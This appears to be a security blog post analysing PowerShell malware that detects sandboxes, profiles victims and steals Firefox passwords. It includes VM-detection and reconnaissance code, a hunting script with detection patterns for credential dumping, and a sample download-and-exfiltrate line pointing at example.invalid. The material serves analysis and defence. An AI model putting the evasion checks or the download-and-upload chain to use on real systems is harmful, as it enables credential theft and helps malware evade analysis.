InfoSec Handlers Diary Blog

PowerShell is a great language that can interact at a low level with Microsoft Windows. While hunting, I found a nice piece of PowerShell code. After some deeper checks, it turned out that the code was not brand new, but it remains interesting to see how a piece of malware decides whether to infect a computer (or not) and then tries to collect interesting data from the victim.

Notes:

1. The different snippets of code presented here are only for learning purposes
2. The code has been beautified

Usually, malware will avoid installing itself in a virtualized environment (an automated sandbox or a security analyst's lab). A common way to detect a virtualized environment is to check BIOS values: hypervisors tend to brand the BIOS vendor, version, serial number or system model with their own name. PowerShell can query a lot of this operating system information through WMI[1].
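The following is an added example of such a check and is not the malware's code from the diary. It queries the same WMI classes (Win32_BIOS and Win32_ComputerSystem) through Get-CimInstance, which works in both Windows PowerShell and PowerShell 7, and compares the fields against a list of well-known hypervisor vendor strings. That list, and the function name, are assumptions for illustration; a sandbox may spoof or omit these values, so the result is evidence, not proof.

```powershell
# Added example (not the diary's malware code): detect a virtualized guest from BIOS
# and system-model strings exposed through WMI.
function Test-VirtualMachine {
    [CmdletBinding()]
    param()

    $bios   = Get-CimInstance -ClassName Win32_BIOS
    $system = Get-CimInstance -ClassName Win32_ComputerSystem

    # Fields that hypervisors commonly brand with their own vendor name
    $fields = @(
        $bios.Manufacturer,
        $bios.SMBIOSBIOSVersion,
        $bios.SerialNumber,
        $system.Manufacturer,
        $system.Model
    ) | Where-Object { $_ }

    # Vendor strings seen in virtualized guests (assumption: illustrative, not exhaustive)
    $markers = 'VMware', 'VirtualBox', 'VBOX', 'QEMU', 'KVM', 'Xen', 'Bochs',
               'Parallels', 'Virtual Machine', 'Hyper-V', 'innotek', 'BHYVE'

    # -match is case-insensitive; escape the marker so it is matched literally
    $hits = foreach ($value in $fields) {
        foreach ($marker in $markers) {
            if ($value -match [regex]::Escape($marker)) { "$marker <- $value" }
        }
    }

    [pscustomobject]@{
        BiosManufacturer  = $bios.Manufacturer
        BiosVersion       = $bios.SMBIOSBIOSVersion
        SystemModel       = $system.Model
        # HypervisorPresent is also $true on a Hyper-V *host*, so it is a weak signal on its own
        HypervisorPresent = $system.HypervisorPresent
        IsVirtual         = [bool]$hits
        Evidence          = @($hits | Select-Object -Unique)
    }
}

Test-VirtualMachine
```

Run it on an analysis VM and on a physical host and compare the Evidence field: if your sandbox shows up here, so it will for the malware, which is exactly why hardened sandboxes rewrite these SMBIOS strings before detonating samples.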

Because it is useful to learn more about the victim, the malware then grabs some information about the computer and its network. You can also see how it detects whether PowerShell is running with admin rights and whether the computer is a domain member.
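As an added example, not the code from the diary, here is how the same reconnaissance can be expressed in PowerShell: host and network facts from WMI, the domain-membership flag from Win32_ComputerSystem, and an admin check that asks whether the current process token actually holds the Administrators role. The function names and the set of fields collected are my choices for illustration.

```powershell
# Added example (not the diary's malware code): basic host, network, privilege and
# domain reconnaissance of the kind described in the text.

function Test-IsAdministrator {
    # Checks the *current process token*; under UAC an admin account running a
    # non-elevated PowerShell returns $false here, which is the behaviour we want.
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-HostProfile {
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    # Only adapters with IP enabled; disabled NICs and pseudo-interfaces are dropped
    $nics = Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object {
            [pscustomobject]@{
                Description = $_.Description
                MACAddress  = $_.MACAddress
                IPAddress   = @($_.IPAddress)
                Gateway     = @($_.DefaultIPGateway)
                DNSServers  = @($_.DNSServerSearchOrder)
                DHCP        = $_.DHCPEnabled
            }
        }

    [pscustomobject]@{
        Hostname       = $cs.Name
        Domain         = $cs.Domain          # holds the workgroup name when not domain-joined
        PartOfDomain   = $cs.PartOfDomain    # $true only for a real domain member
        CurrentUser    = "$env:USERDOMAIN\$env:USERNAME"
        IsAdmin        = Test-IsAdministrator
        OSCaption      = $os.Caption
        OSVersion      = $os.Version
        OSArchitecture = $os.OSArchitecture
        Adapters       = @($nics)
    }
}

Get-HostProfile | Format-List
```

PartOfDomain is the reliable test for domain membership; checking only that the Domain property is non-empty would misfire, because WMI fills it with the workgroup name on standalone machines.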

The malware also contains a password stealer for Firefox. It downloads another PowerShell script that can decode the saved Firefox passwords: Get-FoxDump, which is part of the Empire framework[3]. The stolen credentials are then exfiltrated to another website.
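From the defender's side, the behaviour described above (a download cradle fetching a second-stage script, Get-FoxDump being invoked, and an HTTP upload of the result) leaves traces in PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, which must be enabled by policy). The following is an added hunting example, not code from the diary: the indicator patterns are my assumptions, and the two sample script blocks are constructed (with non-routable example hostnames) so the logic runs offline; a live query helper is included for real logs.

```powershell
# Added example (not the diary's code): hunt script block logs for the download cradle,
# Firefox credential dumper and exfiltration behaviours described in the text.

# Indicator regexes (assumption: illustrative patterns, tune them for your estate)
$Indicators = @{
    DownloadCradle = '(Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer)'
    InMemoryExec   = '(\bIEX\b|Invoke-Expression)'
    FirefoxDumper  = '(Get-FoxDump|logins\.json|signons\.sqlite|key[34]\.db|nss3\.dll)'
    Exfiltration   = '(UploadString|UploadFile|UploadData|-Method\s+Post|\.PostAsync)'
}

function Find-SuspiciousScriptBlock {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$ScriptBlockText
    )
    process {
        $matched = foreach ($name in $Indicators.Keys) {
            if ($ScriptBlockText -match $Indicators[$name]) { $name }
        }
        if ($matched) {
            # Collapse whitespace first so the snippet length is computed on the flattened text
            $flat = $ScriptBlockText -replace '\s+', ' '
            [pscustomobject]@{
                Indicators = ($matched | Sort-Object) -join ','
                Score      = @($matched).Count
                Snippet    = $flat.Substring(0, [Math]::Min(80, $flat.Length))
            }
        }
    }
}

function Get-ScriptBlockEvents {
    # Live variant: pull ScriptBlockText (Properties[2]) from real 4104 events
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object { $_.Properties[2].Value }
}

# Constructed sample blocks (not real log data): one benign, one mimicking the diary's chain
$SampleBlocks = @(
    'Get-ChildItem -Path C:\Temp | Where-Object { $_.Length -gt 1MB }',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/Get-FoxDump.ps1"); $c = Get-FoxDump; (New-Object Net.WebClient).UploadString("http://example.invalid/drop", ($c | Out-String))'
)

$SampleBlocks | Find-SuspiciousScriptBlock | Format-Table -AutoSize

# Against real logs on a host with Script Block Logging enabled:
# Get-ScriptBlockEvents | Find-SuspiciousScriptBlock | Where-Object Score -ge 2 | Format-Table -AutoSize
```

On the constructed input only the second block is reported, with all four indicator classes matched; requiring a Score of two or more when hunting over real logs keeps lone `Invoke-WebRequest` calls from administrators out of the results while still catching the cradle-plus-dumper-plus-upload chain the diary describes.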